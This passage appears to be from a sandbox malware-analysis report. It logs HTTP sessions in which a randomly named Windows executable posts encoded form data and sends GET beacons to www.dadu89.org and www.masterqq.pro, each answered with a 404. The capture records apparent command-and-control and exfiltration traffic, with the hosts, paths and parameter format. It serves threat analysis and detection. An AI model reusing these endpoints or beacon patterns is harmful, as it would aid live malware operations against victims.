kPJ4bZ=dRTX+DQE92ci2H/g7S/c00kqNIitSbQzEtRj92HMgz6sigMxxdAvylqyYH/SMMnoEX4ckNpeu/CNfrIGfp5VMayFmqqkXP8JjPF5Yui2dS/2In4BAmCbKUu8U9TF6N7QJWGN05PXb8S7fDgfr2D0/uJs2OOLnIIqLurYoB1ycOEp5zMfPrJklb8unpIQoH3nlgyw08x2T0m72obyyhxhCLq7VE39M2h3EA==
Jan 11, 2025 00:07:30.679147959 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:30 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49991	64.46.102.238	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:32.805454016 CET	1778	OUT	POST /4e0r/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dadu89.org Origin: http://www.dadu89.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1247 Cache-Control: max-age=0 Referer: http://www.dadu89.org/4e0r/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 64 52 54 58 2b 44 51 45 39 32 63 69 32 48 2f 67 37 53 2f 63 30 30 6b 71 4e 49 69 74 53 62 51 7a 45 74 52 6a 39 32 48 4d 67 77 61 73 69 56 59 78 78 36 73 76 7a 6c 71 79 62 48 2f 58 4d 4d 6e 31 45 54 73 59 6b 4e 6c 4f 75 36 65 4e 65 4e 45 47 58 34 35 56 56 71 79 46 75 4b 71 6c 61 76 38 6d 6a 50 31 31 59 75 79 32 64 53 2f 32 49 6b 67 42 48 30 71 62 52 55 75 2f 5a 74 54 5a 78 74 37 34 4a 56 33 36 30 35 43 69 59 4d 79 37 66 6e 4d 66 6d 6b 72 30 33 75 4a 75 78 4f 4f 54 6e 49 30 78 4c 75 33 55 6f 42 42 49 63 49 34 70 70 6d 68 79 54 36 42 73 6b 4a 73 78 35 4c 73 54 6d 68 44 75 69 57 6d 33 78 65 42 79 4d 48 2b 51 77 65 58 34 78 54 73 63 45 39 4f 47 4c 46 32 4b 5a 58 78 36 55 65 47 57 31 63 58 71 7a 30 6c 51 55 72 53 4d 59 47 55 36 59 6a 50 77 62 76 5a 4f 55 43 59 48 45 6f 62 73 50 4c 64 37 33 42 49 75 75 75 6b 52 67 7a 33 2f 69 44 56 70 6a 55 50 30 6e 49 30 38 41 37 48 6b 69 72 44 6b 66 67 4c 45 53 4f 39 44 54 2b 2b 48 6d 74 68 52 49 52 57 6f 4a 56 51 34 61 4e 33 56 75 45 57 52 58 62 79 [TRUNCATED] Data Ascii: kPJ4bZ=dRTX+DQE92ci2H/g7S/c00kqNIitSbQzEtRj92HMgwasiVYxx6svzlqybH/XMMn1ETsYkNlOu6eNeNEGX45VVqyFuKqlav8mjP11Yuy2dS/2IkgBH0qbRUu/ZtTZxt74JV3605CiYMy7fnMfmkr03uJuxOOTnI0xLu3UoBBIcI4ppmhyT6BskJsx5LsTmhDuiWm3xeByMH+QweX4xTscE9OGLF2KZXx6UeGW1cXqz0lQUrSMYGU6YjPwbvZOUCYHEobsPLd73BIuuukRgz3/iDVpjUP0nI08A7HkirDkfgLESO9DT++HmthRIRWoJVQ4aN3VuEWRXbyNn83fwu7hPzv5H9Fwhw7rTipLU95HAMAZTDi7TBaPqeIt6BQJdDDrL5s68CBKFSp0pYUq/U1GqFWGKCA5NbBu25o16l80JbHv9TNdcxQahpuTTR3ULyHX3xrqvn0F1o3YBFf3Dy7TKPFpmZIJzgU82h+N81upHsQ3ik5/1uYH9uleoBU/9dVc9KHbpdvzQiiMrJJwiXk/GiXwbzTGDe0Q/H5ULVATqmqpFhDsXvR8RMe1MSRwxnUg/X6X1oEKbOIVuYXwIR09oj3VBvZVD089BZCHmYTNRcKqkodyjboVMS5M0aJaHdVzlDN2t6unL+rdLiiw3nGo4yhr+ChezqD6F1+zSugF6hbo47mo9PFWcnjsicFOBhjEvDkCLtOO0oo/1HtyR+uZge3KRvGXBg0Ucs4iKmcWIp2moxICR/rT+EOjJd/tIjZ5beZcMiAaXxTXzkp7GxAjlBVHhhlCYBxThQPbqF05WI4vUn3giEwr36Q9I34ByExlc2uVoRBgnJTYyNlCD/OH+tMl0Fk1lKCjaw5G8jqDQ2QUGj7YLbPUFiFANoS0tr2uze4k+OaFc9IldZjW1FiLVVDclVuxTE0jAChmNdAw3UklvyLjY0qWHGlVAHn1FTc8kgkggM0RxqNLLmdBHXJfMl1UHaLMzGjXby/DbTj8cD4u4 [TRUNCATED]
Jan 11, 2025 00:07:33.246545076 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:33 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49992	64.46.102.238	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:35.345196962 CET	494	OUT	GET /4e0r/?kPJ4bZ=QT7390Zj1CMJ3HXZrGeN4EAmJbS0Q78DLI8P1UXKji+VvkgG1NYkqFCcU0D6dMabZFhcgMAZgOWRTpEkDoRZObnAtKSbK/tYjp8uZanJfEmCFVgpAUq3InqUAbbh39nPBUu+z58=&cHdXN=988T3LsXMJJH2nc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.dadu89.org Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Jan 11, 2025 00:07:35.803757906 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:35 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49993	104.21.32.1	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:40.865463018 CET	747	OUT	POST /3vdc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.masterqq.pro Origin: http://www.masterqq.pro Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 Cache-Control: max-age=0 Referer: http://www.masterqq.pro/3vdc/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 69 6a 55 30 77 44 46 51 63 62 6a 74 73 31 56 36 58 4d 35 56 2b 44 4a 43 74 43 75 36 51 4c 69 64 56 2f 77 63 62 37 66 51 36 4f 37 53 71 67 57 6f 46 6e 48 34 6e 33 57 59 43 35 58 2f 57 62 39 49 6f 30 46 32 64 4a 41 2f 7a 65 51 31 4c 4f 6d 6b 54 67 47 79 65 58 34 58 72 6b 43 4b 76 5a 51 67 49 6e 53 65 41 57 44 62 74 4f 4a 79 56 44 6c 55 46 39 66 69 34 75 6e 58 4e 79 34 6b 53 46 56 66 61 35 62 48 53 6b 53 36 33 4c 6c 4a 30 33 74 71 48 69 42 59 69 42 46 2f 65 79 4a 36 2f 2f 75 68 35 72 59 61 2f 6d 79 66 32 68 43 64 59 57 67 4d 70 51 58 75 6a 2f 51 32 59 33 2f 2b 6a 79 54 41 77 68 6d 65 4c 4b 54 78 2b 36 32 56 Data Ascii: kPJ4bZ=ijU0wDFQcbjts1V6XM5V+DJCtCu6QLidV/wcb7fQ6O7SqgWoFnH4n3WYC5X/Wb9Io0F2dJA/zeQ1LOmkTgGyeX4XrkCKvZQgInSeAWDbtOJyVDlUF9fi4unXNy4kSFVfa5bHSkS63LlJ03tqHiBYiBF/eyJ6//uh5rYa/myf2hCdYWgMpQXuj/Q2Y3/+jyTAwhmeLKTx+62V
Jan 11, 2025 00:07:41.468499899 CET	1051	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:41 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDccwmWDqjxiMVPLtQcSblNNYepiBCw%2FD6xukWzLuVQbImsSyj42Wjx9hESFFYC9JyOQAsu%2BNhahH6f7PmRGXP%2B6Uw8YvVoVVr%2FFriDGIV1spEgy88L%2FtBUA78r9QcjNq3FP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000531ee9cc72b9-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1818&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].'bNoIa?5%6O3?+8qi>EhcRx,"pD8*Y60

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49994	104.21.32.1	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:43.439460993 CET	771	OUT	POST /3vdc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.masterqq.pro Origin: http://www.masterqq.pro Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 235 Cache-Control: max-age=0 Referer: http://www.masterqq.pro/3vdc/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 69 6a 55 30 77 44 46 51 63 62 6a 74 74 56 6c 36 56 73 46 56 32 44 4a 42 78 53 75 36 65 72 69 42 56 2f 4d 63 62 2b 76 41 36 38 50 53 71 41 6d 6f 45 6a 62 34 6d 33 57 59 4a 5a 58 77 4a 4c 38 45 6f 30 49 56 64 4a 4d 2f 7a 65 55 31 4c 4e 79 6b 54 52 47 78 65 48 34 4a 79 55 44 73 68 35 51 67 49 6e 53 65 41 53 71 32 74 50 68 79 53 77 39 55 45 59 6a 6c 32 4f 6e 59 62 69 34 6b 46 31 55 55 61 35 62 70 53 6c 4f 55 33 4a 64 4a 30 7a 68 71 43 6a 42 66 33 52 46 39 42 69 49 62 2b 4f 66 66 33 6f 42 61 35 32 6d 69 6e 79 36 46 5a 67 39 57 31 6a 58 4e 78 76 77 30 59 31 6e 4d 6a 53 54 71 79 68 65 65 5a 64 66 57 78 4f 54 32 43 33 30 56 4d 6b 32 77 47 56 36 58 66 7a 57 4b 78 70 46 31 70 41 3d 3d Data Ascii: kPJ4bZ=ijU0wDFQcbjttVl6VsFV2DJBxSu6eriBV/Mcb+vA68PSqAmoEjb4m3WYJZXwJL8Eo0IVdJM/zeU1LNykTRGxeH4JyUDsh5QgInSeASq2tPhySw9UEYjl2OnYbi4kF1UUa5bpSlOU3JdJ0zhqCjBf3RF9BiIb+Off3oBa52miny6FZg9W1jXNxvw0Y1nMjSTqyheeZdfWxOT2C30VMk2wGV6XfzWKxpF1pA==
Jan 11, 2025 00:07:44.014473915 CET	1039	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:43 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYIthD02RKKTyrl1pOPzk4sOazbf9iknn7dYxIccMNGIMJuFVDYZVSS7IBx8Zkx4efWyrX9yT0m14Qv329jquJ0e64FiJ1YogtRESaBJut7Ff62g3OgwlKXcv16CiZVOf1H8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000532eef14c327-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1752&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].'bNoIa?5%6O3?+8qi>EhcRx,"pD8*Y60

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49996	104.21.32.1	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:45.999769926 CET	1784	OUT	POST /3vdc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.masterqq.pro Origin: http://www.masterqq.pro Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1247 Cache-Control: max-age=0 Referer: http://www.masterqq.pro/3vdc/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 69 6a 55 30 77 44 46 51 63 62 6a 74 74 56 6c 36 56 73 46 56 32 44 4a 42 78 53 75 36 65 72 69 42 56 2f 4d 63 62 2b 76 41 36 38 33 53 71 7a 65 6f 45 43 62 34 67 48 57 59 45 35 58 7a 4a 4c 38 4e 6f 30 67 4a 64 4a 51 42 7a 63 63 31 4c 74 75 6b 56 6c 71 78 52 48 34 4a 36 30 44 34 76 5a 52 30 49 6e 43 53 41 57 47 32 74 50 68 79 53 32 35 55 4e 74 66 6c 37 75 6e 58 4e 79 34 42 53 46 55 38 61 35 44 66 53 6c 4b 71 72 6f 39 4a 30 58 4e 71 46 41 70 66 71 68 46 37 41 69 49 35 2b 4f 54 36 33 72 6c 38 35 31 36 49 6e 78 6d 46 59 57 63 4d 75 68 44 77 6e 65 59 4c 45 6d 54 72 76 6e 37 4e 39 41 57 77 59 63 54 62 35 74 4f 61 43 77 31 4f 45 56 33 31 47 6d 32 2b 42 47 76 61 77 61 30 67 36 58 52 69 2b 59 79 78 58 6f 57 6d 61 46 5a 63 58 66 5a 4c 65 2b 63 61 6a 48 50 64 65 45 6d 6c 56 32 79 42 78 4b 6c 54 47 4e 46 30 76 69 46 77 53 31 75 51 76 41 4c 61 57 2b 6e 63 58 4d 56 43 75 54 48 45 6f 67 41 41 74 48 6d 59 7a 76 44 49 39 44 32 4c 57 74 5a 36 6f 59 36 75 36 6c 31 69 61 6b 4c 30 57 4b 2b 68 44 5a 69 [TRUNCATED] Data Ascii: kPJ4bZ=ijU0wDFQcbjttVl6VsFV2DJBxSu6eriBV/Mcb+vA683SqzeoECb4gHWYE5XzJL8No0gJdJQBzcc1LtukVlqxRH4J60D4vZR0InCSAWG2tPhyS25UNtfl7unXNy4BSFU8a5DfSlKqro9J0XNqFApfqhF7AiI5+OT63rl8516InxmFYWcMuhDwneYLEmTrvn7N9AWwYcTb5tOaCw1OEV31Gm2+BGvawa0g6XRi+YyxXoWmaFZcXfZLe+cajHPdeEmlV2yBxKlTGNF0viFwS1uQvALaW+ncXMVCuTHEogAAtHmYzvDI9D2LWtZ6oY6u6l1iakL0WK+hDZiZD10tJnxeRIK548dhesQKN0223cfYx/myOFTVip38+7kBQbb4Le7xoRQ0dX4iz9rfhtyAKxkaEjj9HT/tnNZY1A9hxFQXG0ulGrdT0UYjuRunrEgj8Q3tAzqqF8BF9ZnXuyyqGfHP0mcBaQDipIU07kPqw+nOuAu4TUg1hUdSav9CalAXZXsSYbBFnPFfm+4Yn2sPvAojghJ/d1+Hz1EZ7MJgpbrWSsw/xTlHHzHzMr9s+u3XTW5tEyP39bPqZ3e6W+4xPfuzhDuc+F6SVmytpuyYa0Q/3CV56+CEFfkzQlv48lu4cNO9WtEK1eanNwpcV2xMA90fF0fvpiWpPJ1n+euKfsOIH2+fssguYEIr9zMVU/T3sURaydBzteGQYyP82fVsoy1aYuHpAaKQwjxUWDw4YWjFsN3+Fy9ZVdD5HZy9U0XXzjGhc68x1MFNsCz9J7ajWNDtNy/0+FAv/V+CH23BA9+9eBb17ZY9oQ7IgpdYNtIxvTl8FtNUdA+dbQ9s+3PjOAw57MKYZmySQ05mvg5d2iap1yHCQMquL/OniN5L9fOMX+q0tKT9Fd0duP1VYlfM4CU6RoMV4DwQuWaKsM1VlPcMBRGfid4ObESSy35585+tmntR6E0QLOomFo6WsHLpe6ntOlRCEQpan9uZAHook2ulYDE4l [TRUNCATED]
Jan 11, 2025 00:07:46.582110882 CET	1054	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t2iJhmgBmKnyFJo4rCS2ZRfplDt1OL5302e141Nsm78peU2t6Lr1fatVPuExFeoP2nW0bbKO%2F3HWwaO0FWD7AZWLvoyrKvBp56QxkZBCI7k9B4EK7k6lNF5mCU%2FHwiBDBFQl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000533eef328cda-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1802&rtt_var=901&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].'bNoIa?5%6O3?+8qi>EhcRx,"pD8*Y60

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49997	104.21.32.1	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:48.551901102 CET	496	OUT	GET /3vdc/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=vh8Uzz9OV8fhtH1meqE382RNszCOVpONbZRjfq/B9uLstFCNE3abmEu4DqeFZKdG1EFxV7BY8Pk1G/TVKAGyDG9O4gm487ojHWjIBSjIyrwvajxFI/Xm2dfZY0oucSMge7jdbTw= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.masterqq.pro Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
